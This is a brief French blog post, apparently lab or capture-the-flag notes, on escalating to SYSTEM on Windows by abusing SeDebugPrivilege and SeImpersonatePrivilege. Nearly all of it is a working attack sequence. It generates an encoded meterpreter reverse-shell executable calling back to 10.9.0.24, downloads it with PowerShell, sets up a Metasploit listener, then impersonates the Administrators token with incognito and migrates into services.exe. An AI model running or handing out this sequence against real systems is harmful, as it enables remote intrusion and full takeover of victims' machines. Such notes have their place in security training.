Exploitation des privilèges SeDebugPrivilege, SeImpersonatePrivilege

Si on se rend compte que nous avons les privilèges SeDebugPrivilege, SeImpersonatePrivilege, nous pouvons obtenir le compte system, en utilisant le module incognito de meterpreter

Nous créer le code initial pour avoir une session meterpreter
msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=10.9.0.24 LPORT=6666 -f exe -o shell.exe

Téléchargement du code

sudo python -m http.server 80
powershell "(New-Object System.Net.WebClient).Downloadfile('http://10.9.0.24','shell.exe')"

Préparation dans msfconsole

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp 
set LHOST 10.9.0.24 
set LPORT 6666 
run

Exécution du code
shell.exe

Nous avons maintenant une session dans metasploit.

load incognito
list_tokens -g
impersonate_token "BUILTIN\Administrators"
getuid
ps #pour trouver le pid du processus services.exe
migrate <em>services_pid</em>
shell
whoami #devrait être nt authority\system

Leave a Reply